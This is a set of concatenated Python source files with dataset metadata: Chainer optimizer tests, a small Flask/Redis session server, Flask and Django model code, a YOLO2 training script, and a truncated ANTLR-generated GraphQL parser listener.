'AMSGrad',
'AdaBound',
'AMSBound',
'CorrectedMomentumSGD',
'MomentumSGD',
'MSVAG',
'NesterovAG',
'RMSprop',
'RMSpropGraves',
'SGD',
'SMORMS3',
]
_parameterize_optimizers = testing.parameterize(*testing.product({
'optimizer_impl': [getattr(chainer.optimizers, o) for o in _all_optimizers]
}))
class SimpleChain(chainer.Chain):
def __init__(self, shape=()):
super(SimpleChain, self).__init__()
w_np = np.asarray(np.random.randn(*shape)).astype(np.float32)
with self.init_scope():
self.w = chainer.Parameter(w_np, name='w')
def __call__(self, x):
return F.sum((x - self.w) ** 2)
class TestAllOptimizersCoverage(unittest.TestCase):
# Checks _all_optimizers covers all the built-in optimizers.
def test_all_optimizers_coverage(self):
module = chainer.optimizers
module_optimizers = []
for name in dir(module):
obj = getattr(module, name)
if (isinstance(obj, type) and issubclass(obj, chainer.Optimizer)):
module_optimizers.append(name)
assert sorted(_all_optimizers) == sorted(module_optimizers)
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# Intel
{'use_ideep': True},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
{'use_cuda': True, 'cuda_device': 1},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
]
)
@testing.parameterize(*(
# Optimizers constructed with default arguments
[
{
'optimizer': o,
'kwargs': {}
}
for o in _all_optimizers]
    # https://github.com/chainer/chainer/issues/7424
+ [
{
'optimizer': 'Adam',
'kwargs': {'weight_decay_rate': 0.5},
}]
))
@testing.parameterize(*testing.product(
{'shape': [(2, 3), (), (1, 0, 2)]}
))
class TestOptimizer(unittest.TestCase):
def test_optimizer(self, backend_config):
device = backend_config.device
target = SimpleChain(self.shape)
target.to_device(device)
optimizer_cls = getattr(chainer.optimizers, self.optimizer)
optimizer = optimizer_cls(**self.kwargs)
optimizer.setup(target)
x_np = np.asarray(np.random.randn(*self.shape)).astype(np.float32)
x = chainer.Variable(device.send(x_np))
# Just ensures no error occurs. No numerical check is performed.
optimizer.update(target, x)
@_parameterize_optimizers
class TestOptimizerHyperparameter(unittest.TestCase):
def setUp(self):
self.target = chainer.Link()
with self.target.init_scope():
self.target.w = chainer.Parameter()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def get_hyperparam(self, name):
return getattr(self.target.w.update_rule.hyperparam, name)
def test_hyperparams(self):
# TODO(niboshi): The following optimizers do not pass this test
# because their __init__ do not accept some hyperparameters.
# The test should be fixed.
if self.optimizer_impl in (
chainer.optimizers.AdamW,
chainer.optimizers.AMSGrad,
chainer.optimizers.AdaBound,
chainer.optimizers.AMSBound,
):
raise unittest.SkipTest(
'The optimizer is incompatible with this test')
self.create()
default = self.optimizer.hyperparam.get_dict()
for name, default_value in six.iteritems(default):
self.create()
self.assertEqual(self.get_hyperparam(name), default_value)
new_value = default_value + 0.1
self.create(**{name: new_value})
self.assertEqual(self.get_hyperparam(name), new_value)
class WeightSaveHook(object):
name = 'WeightSaveHook'
call_for_each_param = True
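    # Optimizer hook that stores a copy of the parameter data each time it is
    # called, so tests can check whether it ran before or after the update.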
def __init__(self):
self.value = None
def __call__(self, rule, param):
p, g = param.data, param.grad
if p is None or g is None:
return
self.value = np.copy(p)
@_parameterize_optimizers
class TestOptimizerHooks(unittest.TestCase):
def setUp(self):
self.target = SimpleChain()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def get_hyperparam(self, name):
return getattr(self.target.w.update_rule.hyperparam, name)
def test_hooks(self):
w_pre = np.copy(self.target.w.data)
h_pre = WeightSaveHook()
h_post = WeightSaveHook()
self.create()
self.optimizer.add_hook(h_pre, timing='pre')
self.optimizer.add_hook(h_post, name='WeightSaveHookPost',
timing='post')
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
self.assertEqual(w_pre, h_pre.value)
self.assertEqual(w_post, h_post.value)
self.assertNotEqual(h_pre.value, h_post.value)
def test_hooks_auto(self):
w_pre = np.copy(self.target.w.data)
h_pre = WeightSaveHook()
h_pre.timing = 'pre'
h_post = WeightSaveHook()
h_post.timing = 'post'
self.create()
self.optimizer.add_hook(h_pre, timing='auto')
self.optimizer.add_hook(h_post, name='WeightSaveHookPost',
timing='auto')
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
self.assertEqual(w_pre, h_pre.value)
self.assertEqual(w_post, h_post.value)
self.assertNotEqual(h_pre.value, h_post.value)
@_parameterize_optimizers
class TestOptimizerPickable(unittest.TestCase):
def setUp(self):
self.target = SimpleChain()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def get_hyperparam(self, name):
return getattr(self.target.w.update_rule.hyperparam, name)
def test_new_pickle(self):
self.create()
pickled_opt = pickle.dumps(self.optimizer)
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
# Pickle has saved a copy of the target
opt = pickle.loads(pickled_opt)
opt.update(opt.target, x)
pickled_w_post = np.copy(opt.target.w.data)
self.assertEqual(w_post, pickled_w_post)
def test_updated_pickle(self):
self.create()
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
pickled_opt = pickle.dumps(self.optimizer)
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
# Pickle has saved a copy of the target
opt = pickle.loads(pickled_opt)
opt.update(opt.target, x)
pickled_w_post = np.copy(opt.target.w.data)
self.assertEqual(w_post, pickled_w_post)
@_parameterize_optimizers
class TestOptimizerLossScaling(unittest.TestCase):
def setUp(self):
self.target = SimpleChain()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def test_invalid_configs(self):
self.create()
with self.assertRaises(ValueError):
self.optimizer.loss_scaling(interval=0)
with self.assertRaises(ValueError):
self.optimizer.loss_scaling(scale=-1)
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# Intel
{'use_ideep': True},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
]
)
class TestAdamW(unittest.TestCase):
def test_adam_w(self, backend_config):
xp = backend_config.xp
device = backend_config.device
link = chainer.Link(x=(1,))
link.to_device(device)
opt = optimizers.Adam(eta=0.5, weight_decay_rate=0.1)
opt.setup(link)
link.x.data.fill(1)
link.x.grad = device.send(xp.ones_like(link.x.data))
opt.update()
# compare against the value computed with v5 impl
testing.assert_allclose(link.x.data, np.array([0.9495]),
atol=1e-7, rtol=1e-7)
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# Intel
{'use_ideep': True},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
]
)
class TestAMSGrad(unittest.TestCase):
def test_amsgrad(self, backend_config):
device = backend_config.device
link = chainer.Link(x=(4,))
x = link.x
x.data.fill(0)
link.to_device(device)
opt = optimizers.Adam(alpha=0.01, beta2=0.7, amsgrad=True)
opt.setup(link)
x.grad = device.send(np.array([1, -1, 10, -10], np.float32))
opt.update()
testing.assert_allclose(
x.update_rule.state['v'],
[0.3, 0.3, 30, 30],
atol=1e-7, rtol=1e-7)
testing.assert_allclose(
x.data,
[-0.01, 0.01, -0.01, 0.01],
atol=1e-7, rtol=1e-7)
x.grad = device.send(np.array([-10, -10, -1, -1], np.float32))
opt.update()
testing.assert_allclose(
x.update_rule.state['v'],
[30.21, 30.21, 21.3, 21.3],
atol=1e-7, rtol=1e-7)
testing.assert_allclose(
x.update_rule.state['vhat'],
[30.21, 30.21, 30, 30],
atol=1e-7, rtol=1e-7)
testing.assert_allclose(
x.data,
# result with NumPy
[-0.00377703, 0.01745388, -0.01548985, 0.01686232],
atol=1e-7, rtol=1e-7)
testing.run_module(__name__, __file__)
| 29.137838 | 79 | 0.604675 |
a0d7c0c916f3ac9a4f2360f45a9979f8d9772f52 | 873 | py | Python | martin.carrasco/Tarea3/server.py | Nadnus/Dev-Plats | e90bc4770b9c0b7898a19168f6310275e7aa6eab | [
"MIT"
] | null | null | null | martin.carrasco/Tarea3/server.py | Nadnus/Dev-Plats | e90bc4770b9c0b7898a19168f6310275e7aa6eab | [
"MIT"
] | null | null | null | martin.carrasco/Tarea3/server.py | Nadnus/Dev-Plats | e90bc4770b9c0b7898a19168f6310275e7aa6eab | [
"MIT"
] | null | null | null | from functools import wraps
from flask import Flask, render_template, session, request, redirect, url_for
import redis
import os
app = Flask(__name__)
#redis_i = redis.from_url("redis://localhost:6379")
redis_i = redis.StrictRedis(host='localhost', port=6379, db=0)
app.secret_key = os.urandom(24)
def check_redis(f):
@wraps(f)
def decorated_fun(*args, **kwargs):
id = kwargs["id"]
        # lrange returns bytes, so encode the id for the membership check
        if id not in session and id.encode() in redis_i.lrange("user_list", 0, -1):
            redis_i.lrem("user_list", 0, id)
        return f(*args, **kwargs)
    return decorated_fun
@app.route("/<id>")
@check_redis
def index(id):
if 'user' not in session:
session['user'] = id
redis_i.lpush("user_list", id)
return "Logged!"
@app.route("/users")
def users():
l = b",".join(list(redis_i.lrange("user_list", 0, -1)))
return l
if __name__ == "__main__":
    redis_i.delete("user_list")  # reset the stored user list before serving
    app.run()
| 24.25 | 77 | 0.642612 |
cb6529afd094479a69475c8939f6264cffea5aed | 315 | py | Python | src/web/models.py | canl/algo-trading | 288f43a54d6594f79c79dc21f5534ad9aa785b29 | [
"MIT"
] | 11 | 2020-04-04T08:59:37.000Z | 2020-12-25T20:21:05.000Z | src/web/models.py | canl/algo-trading | 288f43a54d6594f79c79dc21f5534ad9aa785b29 | [
"MIT"
] | 1 | 2021-12-13T20:35:20.000Z | 2021-12-13T20:35:20.000Z | src/web/models.py | canl/algo-trading | 288f43a54d6594f79c79dc21f5534ad9aa785b29 | [
"MIT"
] | 3 | 2020-06-21T16:29:56.000Z | 2020-07-18T15:15:01.000Z | from flask_login import UserMixin
from src.web import db
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True) # primary keys are required by SQLAlchemy
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
name = db.Column(db.String(1000))
| 28.636364 | 91 | 0.71746 |
3ef8bdeab62535a82ee775bed63e566846b51edd | 480 | py | Python | medusa_website/org_chart/migrations/0006_alter_committeerole_email.py | DeakinMeDUSA/medusa_website | 2f865a34ca29b42f4376623659f0e5b3a457769d | [
"MIT"
] | null | null | null | medusa_website/org_chart/migrations/0006_alter_committeerole_email.py | DeakinMeDUSA/medusa_website | 2f865a34ca29b42f4376623659f0e5b3a457769d | [
"MIT"
] | null | null | null | medusa_website/org_chart/migrations/0006_alter_committeerole_email.py | DeakinMeDUSA/medusa_website | 2f865a34ca29b42f4376623659f0e5b3a457769d | [
"MIT"
] | null | null | null | # Generated by Django 3.2.10 on 2022-01-03 08:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('org_chart', '0005_committeememberrecord'),
]
operations = [
migrations.AlterField(
model_name='committeerole',
name='email',
field=models.EmailField(help_text='Must not be the personal email of the position holder', max_length=254, unique=True),
),
]
| 25.263158 | 132 | 0.641667 |
79fb6fce030cb7f946bca21bfd1d13c5b7400a15 | 9,069 | py | Python | train.py | bklppr/yolo2_onnx | fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4 | [
"MIT"
] | null | null | null | train.py | bklppr/yolo2_onnx | fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4 | [
"MIT"
] | null | null | null | train.py | bklppr/yolo2_onnx | fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4 | [
"MIT"
] | 1 | 2018-07-11T22:44:11.000Z | 2018-07-11T22:44:11.000Z | from __future__ import print_function
import sys
if len(sys.argv) != 4:
print('Usage:')
print('python train.py datacfg cfgfile weightfile')
exit()
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.backends.cudnn as cudnn
from torchvision import datasets, transforms
from torch.autograd import Variable
import dataset
import random
import math
import os
from utils import *
from cfg import parse_cfg
from region_loss import RegionLoss
from darknet import Darknet
from models.tiny_yolo import TinyYoloNet
# Training settings
datacfg = sys.argv[1]
cfgfile = sys.argv[2]
weightfile = sys.argv[3]
data_options = read_data_cfg(datacfg)
net_options = parse_cfg(cfgfile)[0]
trainlist = data_options['train']
testlist = data_options['valid']
backupdir = data_options['backup']
nsamples = file_lines(trainlist)
gpus = data_options['gpus'] # e.g. 0,1,2,3
ngpus = len(gpus.split(','))
num_workers = int(data_options['num_workers'])
batch_size = int(net_options['batch'])
max_batches = int(net_options['max_batches'])
learning_rate = float(net_options['learning_rate'])
momentum = float(net_options['momentum'])
decay = float(net_options['decay'])
steps = [float(step) for step in net_options['steps'].split(',')]
scales = [float(scale) for scale in net_options['scales'].split(',')]
#Train parameters
max_epochs = max_batches*batch_size/nsamples+1
use_cuda = True
seed = int(time.time())
eps = 1e-5
save_interval = 10 # epoches
dot_interval = 70 # batches
# Test parameters
conf_thresh = 0.25
nms_thresh = 0.4
iou_thresh = 0.5
if not os.path.exists(backupdir):
os.mkdir(backupdir)
###############
torch.manual_seed(seed)
if use_cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = gpus
torch.cuda.manual_seed(seed)
model = Darknet(cfgfile)
region_loss = model.loss
model.load_weights(weightfile)
layers = list(model.children())[0]
for item in list(layers)[:-2]:
item.requires_grad=False
model.print_network()
region_loss.seen = model.seen
processed_batches = model.seen/batch_size
init_width = model.width
init_height = model.height
init_epoch = 0 #model.seen/nsamples
kwargs = {'num_workers': num_workers, 'pin_memory': True} if use_cuda else {}
test_loader = torch.utils.data.DataLoader(
dataset.listDataset(testlist, shape=(init_width, init_height),
shuffle=False,
transform=transforms.Compose([
transforms.ToTensor(),
]), train=False),
batch_size=batch_size, shuffle=False, **kwargs)
if use_cuda:
if ngpus > 1:
model = torch.nn.DataParallel(model).cuda()
else:
model = model.cuda()
params_dict = dict(model.named_parameters())
params = []
for key, value in params_dict.items():
if key.find('.bn') >= 0 or key.find('.bias') >= 0:
params += [{'params': [value], 'weight_decay': 0.0}]
else:
params += [{'params': [value], 'weight_decay': decay*batch_size}]
optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum, dampening=0, weight_decay=decay*batch_size)
def adjust_learning_rate(optimizer, batch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = learning_rate
for i in range(len(steps)):
scale = scales[i] if i < len(scales) else 1
if batch >= steps[i]:
lr = lr * scale
if batch == steps[i]:
break
else:
break
for param_group in optimizer.param_groups:
param_group['lr'] = lr/batch_size
return lr
def train(epoch):
global processed_batches
t0 = time.time()
if ngpus > 1:
cur_model = model.module
else:
cur_model = model
train_loader = torch.utils.data.DataLoader(
dataset.listDataset(trainlist, shape=(init_width, init_height),
shuffle=True,
transform=transforms.Compose([
transforms.ToTensor(),
]),
train=True,
seen=cur_model.seen,
batch_size=batch_size,
num_workers=num_workers),
batch_size=batch_size, shuffle=False, **kwargs)
lr = learning_rate #adjust_learning_rate(optimizer, processed_batches)
logging('epoch %d, processed %d samples, lr %f' % (epoch, epoch * len(train_loader.dataset), lr))
model.train()
t1 = time.time()
avg_time = torch.zeros(9)
for batch_idx, (data, target) in enumerate(train_loader):
t2 = time.time()
# adjust_learning_rate(optimizer, processed_batches)
processed_batches = processed_batches + 1
#if (batch_idx+1) % dot_interval == 0:
# sys.stdout.write('.')
if use_cuda:
data = data.cuda()
#target= target.cuda()
t3 = time.time()
data, target = Variable(data), Variable(target)
t4 = time.time()
optimizer.zero_grad()
t5 = time.time()
output = model(data)
t6 = time.time()
region_loss.seen = region_loss.seen + data.data.size(0)
loss = region_loss(output, target)
t7 = time.time()
loss.backward()
t8 = time.time()
optimizer.step()
t9 = time.time()
if False and batch_idx > 1:
avg_time[0] = avg_time[0] + (t2-t1)
avg_time[1] = avg_time[1] + (t3-t2)
avg_time[2] = avg_time[2] + (t4-t3)
avg_time[3] = avg_time[3] + (t5-t4)
avg_time[4] = avg_time[4] + (t6-t5)
avg_time[5] = avg_time[5] + (t7-t6)
avg_time[6] = avg_time[6] + (t8-t7)
avg_time[7] = avg_time[7] + (t9-t8)
avg_time[8] = avg_time[8] + (t9-t1)
            print('-------------------------------')
print(' load data : %f' % (avg_time[0]/(batch_idx)))
print(' cpu to cuda : %f' % (avg_time[1]/(batch_idx)))
print('cuda to variable : %f' % (avg_time[2]/(batch_idx)))
print(' zero_grad : %f' % (avg_time[3]/(batch_idx)))
print(' forward feature : %f' % (avg_time[4]/(batch_idx)))
print(' forward loss : %f' % (avg_time[5]/(batch_idx)))
print(' backward : %f' % (avg_time[6]/(batch_idx)))
print(' step : %f' % (avg_time[7]/(batch_idx)))
print(' total : %f' % (avg_time[8]/(batch_idx)))
t1 = time.time()
print('')
t1 = time.time()
logging('training with %f samples/s' % (len(train_loader.dataset)/(t1-t0)))
if (epoch+1) % save_interval == 0:
logging('save weights to %s/%06d.weights' % (backupdir, epoch+1))
cur_model.seen = (epoch + 1) * len(train_loader.dataset)
cur_model.save_weights('%s/%06d.weights' % (backupdir, epoch+1))
def test(epoch):
def truths_length(truths):
for i in range(50):
if truths[i][1] == 0:
return i
model.eval()
if ngpus > 1:
cur_model = model.module
else:
cur_model = model
num_classes = cur_model.num_classes
anchors = cur_model.anchors
num_anchors = cur_model.num_anchors
total = 0.0
proposals = 0.0
correct = 0.0
for batch_idx, (data, target) in enumerate(test_loader):
if use_cuda:
data = data.cuda()
data = Variable(data, volatile=True)
output = model(data).data
all_boxes = get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors)
for i in range(output.size(0)):
boxes = all_boxes[i]
boxes = nms(boxes, nms_thresh)
truths = target[i].view(-1, 5)
num_gts = truths_length(truths)
total = total + num_gts
for i in range(len(boxes)):
if boxes[i][4] > conf_thresh:
proposals = proposals+1
for i in range(num_gts):
box_gt = [truths[i][1], truths[i][2], truths[i][3], truths[i][4], 1.0, 1.0, truths[i][0]]
best_iou = 0
best_j = -1
for j in range(len(boxes)):
iou = bbox_iou(box_gt, boxes[j], x1y1x2y2=False)
if iou > best_iou:
best_j = j
best_iou = iou
if best_iou > iou_thresh and boxes[best_j][6] == box_gt[6]:
correct = correct+1
precision = 1.0*correct/(proposals+eps)
recall = 1.0*correct/(total+eps)
fscore = 2.0*precision*recall/(precision+recall+eps)
logging("precision: %f, recall: %f, fscore: %f" % (precision, recall, fscore))
evaluate = False
if evaluate:
logging('evaluating ...')
test(0)
else:
for epoch in range(int(init_epoch), int(max_epochs)):
train(epoch)
test(epoch)
| 33.839552 | 122 | 0.582424 |
0d928312a375c95ae1bbf7deb1d0053d3397e001 | 22,980 | py | Python | schemagen/antlr/GraphQLListener.py | GoZaddy/SchemaGen | c8374382f6b52ad3cec398c77fd5bc90fe891818 | [
"MIT"
] | 3 | 2021-03-26T22:51:41.000Z | 2021-03-27T15:17:24.000Z | schemagen/antlr/GraphQLListener.py | GoZaddy/SchemaGen | c8374382f6b52ad3cec398c77fd5bc90fe891818 | [
"MIT"
] | null | null | null | schemagen/antlr/GraphQLListener.py | GoZaddy/SchemaGen | c8374382f6b52ad3cec398c77fd5bc90fe891818 | [
"MIT"
] | null | null | null | # Generated from GraphQL.g4 by ANTLR 4.9
from antlr4 import *
if __name__ is not None and "." in __name__:
from .GraphQLParser import GraphQLParser
else:
from GraphQLParser import GraphQLParser
# This class defines a complete listener for a parse tree produced by GraphQLParser.
class GraphQLListener(ParseTreeListener):
# Enter a parse tree produced by GraphQLParser#document.
def enterDocument(self, ctx:GraphQLParser.DocumentContext):
pass
# Exit a parse tree produced by GraphQLParser#document.
def exitDocument(self, ctx:GraphQLParser.DocumentContext):
pass
# Enter a parse tree produced by GraphQLParser#definition.
def enterDefinition(self, ctx:GraphQLParser.DefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#definition.
def exitDefinition(self, ctx:GraphQLParser.DefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#executableDefinition.
def enterExecutableDefinition(self, ctx:GraphQLParser.ExecutableDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#executableDefinition.
def exitExecutableDefinition(self, ctx:GraphQLParser.ExecutableDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#operationDefinition.
def enterOperationDefinition(self, ctx:GraphQLParser.OperationDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#operationDefinition.
def exitOperationDefinition(self, ctx:GraphQLParser.OperationDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#operationType.
def enterOperationType(self, ctx:GraphQLParser.OperationTypeContext):
pass
# Exit a parse tree produced by GraphQLParser#operationType.
def exitOperationType(self, ctx:GraphQLParser.OperationTypeContext):
pass
# Enter a parse tree produced by GraphQLParser#selectionSet.
def enterSelectionSet(self, ctx:GraphQLParser.SelectionSetContext):
pass
# Exit a parse tree produced by GraphQLParser#selectionSet.
def exitSelectionSet(self, ctx:GraphQLParser.SelectionSetContext):
pass
# Enter a parse tree produced by GraphQLParser#selection.
def enterSelection(self, ctx:GraphQLParser.SelectionContext):
pass
# Exit a parse tree produced by GraphQLParser#selection.
def exitSelection(self, ctx:GraphQLParser.SelectionContext):
pass
# Enter a parse tree produced by GraphQLParser#field.
def enterField(self, ctx:GraphQLParser.FieldContext):
pass
# Exit a parse tree produced by GraphQLParser#field.
def exitField(self, ctx:GraphQLParser.FieldContext):
pass
# Enter a parse tree produced by GraphQLParser#arguments.
def enterArguments(self, ctx:GraphQLParser.ArgumentsContext):
pass
# Exit a parse tree produced by GraphQLParser#arguments.
def exitArguments(self, ctx:GraphQLParser.ArgumentsContext):
pass
# Enter a parse tree produced by GraphQLParser#argument.
def enterArgument(self, ctx:GraphQLParser.ArgumentContext):
pass
# Exit a parse tree produced by GraphQLParser#argument.
def exitArgument(self, ctx:GraphQLParser.ArgumentContext):
pass
# Enter a parse tree produced by GraphQLParser#alias.
def enterAlias(self, ctx:GraphQLParser.AliasContext):
pass
# Exit a parse tree produced by GraphQLParser#alias.
def exitAlias(self, ctx:GraphQLParser.AliasContext):
pass
# Enter a parse tree produced by GraphQLParser#fragmentSpread.
def enterFragmentSpread(self, ctx:GraphQLParser.FragmentSpreadContext):
pass
# Exit a parse tree produced by GraphQLParser#fragmentSpread.
def exitFragmentSpread(self, ctx:GraphQLParser.FragmentSpreadContext):
pass
# Enter a parse tree produced by GraphQLParser#fragmentDefinition.
def enterFragmentDefinition(self, ctx:GraphQLParser.FragmentDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#fragmentDefinition.
def exitFragmentDefinition(self, ctx:GraphQLParser.FragmentDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#fragmentName.
def enterFragmentName(self, ctx:GraphQLParser.FragmentNameContext):
pass
# Exit a parse tree produced by GraphQLParser#fragmentName.
def exitFragmentName(self, ctx:GraphQLParser.FragmentNameContext):
pass
# Enter a parse tree produced by GraphQLParser#typeCondition.
def enterTypeCondition(self, ctx:GraphQLParser.TypeConditionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeCondition.
def exitTypeCondition(self, ctx:GraphQLParser.TypeConditionContext):
pass
# Enter a parse tree produced by GraphQLParser#inlineFragment.
def enterInlineFragment(self, ctx:GraphQLParser.InlineFragmentContext):
pass
# Exit a parse tree produced by GraphQLParser#inlineFragment.
def exitInlineFragment(self, ctx:GraphQLParser.InlineFragmentContext):
pass
# Enter a parse tree produced by GraphQLParser#value.
def enterValue(self, ctx:GraphQLParser.ValueContext):
pass
# Exit a parse tree produced by GraphQLParser#value.
def exitValue(self, ctx:GraphQLParser.ValueContext):
pass
# Enter a parse tree produced by GraphQLParser#intValue.
def enterIntValue(self, ctx:GraphQLParser.IntValueContext):
pass
# Exit a parse tree produced by GraphQLParser#intValue.
def exitIntValue(self, ctx:GraphQLParser.IntValueContext):
pass
# Enter a parse tree produced by GraphQLParser#floatValue.
def enterFloatValue(self, ctx:GraphQLParser.FloatValueContext):
pass
# Exit a parse tree produced by GraphQLParser#floatValue.
def exitFloatValue(self, ctx:GraphQLParser.FloatValueContext):
pass
# Enter a parse tree produced by GraphQLParser#booleanValue.
def enterBooleanValue(self, ctx:GraphQLParser.BooleanValueContext):
pass
# Exit a parse tree produced by GraphQLParser#booleanValue.
def exitBooleanValue(self, ctx:GraphQLParser.BooleanValueContext):
pass
# Enter a parse tree produced by GraphQLParser#stringValue.
def enterStringValue(self, ctx:GraphQLParser.StringValueContext):
pass
# Exit a parse tree produced by GraphQLParser#stringValue.
def exitStringValue(self, ctx:GraphQLParser.StringValueContext):
pass
# Enter a parse tree produced by GraphQLParser#nullValue.
def enterNullValue(self, ctx:GraphQLParser.NullValueContext):
pass
# Exit a parse tree produced by GraphQLParser#nullValue.
def exitNullValue(self, ctx:GraphQLParser.NullValueContext):
pass
# Enter a parse tree produced by GraphQLParser#enumValue.
def enterEnumValue(self, ctx:GraphQLParser.EnumValueContext):
pass
# Exit a parse tree produced by GraphQLParser#enumValue.
def exitEnumValue(self, ctx:GraphQLParser.EnumValueContext):
pass
# Enter a parse tree produced by GraphQLParser#listValue.
def enterListValue(self, ctx:GraphQLParser.ListValueContext):
pass
# Exit a parse tree produced by GraphQLParser#listValue.
def exitListValue(self, ctx:GraphQLParser.ListValueContext):
pass
# Enter a parse tree produced by GraphQLParser#objectValue.
def enterObjectValue(self, ctx:GraphQLParser.ObjectValueContext):
pass
# Exit a parse tree produced by GraphQLParser#objectValue.
def exitObjectValue(self, ctx:GraphQLParser.ObjectValueContext):
pass
# Enter a parse tree produced by GraphQLParser#objectField.
def enterObjectField(self, ctx:GraphQLParser.ObjectFieldContext):
pass
# Exit a parse tree produced by GraphQLParser#objectField.
def exitObjectField(self, ctx:GraphQLParser.ObjectFieldContext):
pass
# Enter a parse tree produced by GraphQLParser#variable.
def enterVariable(self, ctx:GraphQLParser.VariableContext):
pass
# Exit a parse tree produced by GraphQLParser#variable.
def exitVariable(self, ctx:GraphQLParser.VariableContext):
pass
# Enter a parse tree produced by GraphQLParser#variableDefinitions.
def enterVariableDefinitions(self, ctx:GraphQLParser.VariableDefinitionsContext):
pass
# Exit a parse tree produced by GraphQLParser#variableDefinitions.
def exitVariableDefinitions(self, ctx:GraphQLParser.VariableDefinitionsContext):
pass
# Enter a parse tree produced by GraphQLParser#variableDefinition.
def enterVariableDefinition(self, ctx:GraphQLParser.VariableDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#variableDefinition.
def exitVariableDefinition(self, ctx:GraphQLParser.VariableDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#defaultValue.
def enterDefaultValue(self, ctx:GraphQLParser.DefaultValueContext):
pass
# Exit a parse tree produced by GraphQLParser#defaultValue.
def exitDefaultValue(self, ctx:GraphQLParser.DefaultValueContext):
pass
# Enter a parse tree produced by GraphQLParser#type_.
def enterType_(self, ctx:GraphQLParser.Type_Context):
pass
# Exit a parse tree produced by GraphQLParser#type_.
def exitType_(self, ctx:GraphQLParser.Type_Context):
pass
# Enter a parse tree produced by GraphQLParser#namedType.
def enterNamedType(self, ctx:GraphQLParser.NamedTypeContext):
pass
# Exit a parse tree produced by GraphQLParser#namedType.
def exitNamedType(self, ctx:GraphQLParser.NamedTypeContext):
pass
# Enter a parse tree produced by GraphQLParser#listType.
def enterListType(self, ctx:GraphQLParser.ListTypeContext):
pass
# Exit a parse tree produced by GraphQLParser#listType.
def exitListType(self, ctx:GraphQLParser.ListTypeContext):
pass
# Enter a parse tree produced by GraphQLParser#directives.
def enterDirectives(self, ctx:GraphQLParser.DirectivesContext):
pass
# Exit a parse tree produced by GraphQLParser#directives.
def exitDirectives(self, ctx:GraphQLParser.DirectivesContext):
pass
# Enter a parse tree produced by GraphQLParser#directive.
def enterDirective(self, ctx:GraphQLParser.DirectiveContext):
pass
# Exit a parse tree produced by GraphQLParser#directive.
def exitDirective(self, ctx:GraphQLParser.DirectiveContext):
pass
# Enter a parse tree produced by GraphQLParser#typeSystemDefinition.
def enterTypeSystemDefinition(self, ctx:GraphQLParser.TypeSystemDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeSystemDefinition.
def exitTypeSystemDefinition(self, ctx:GraphQLParser.TypeSystemDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#typeSystemExtension.
def enterTypeSystemExtension(self, ctx:GraphQLParser.TypeSystemExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeSystemExtension.
def exitTypeSystemExtension(self, ctx:GraphQLParser.TypeSystemExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#schemaDefinition.
def enterSchemaDefinition(self, ctx:GraphQLParser.SchemaDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#schemaDefinition.
def exitSchemaDefinition(self, ctx:GraphQLParser.SchemaDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#rootOperationTypeDefinition.
def enterRootOperationTypeDefinition(self, ctx:GraphQLParser.RootOperationTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#rootOperationTypeDefinition.
def exitRootOperationTypeDefinition(self, ctx:GraphQLParser.RootOperationTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#schemaExtension.
def enterSchemaExtension(self, ctx:GraphQLParser.SchemaExtensionContext):
pass
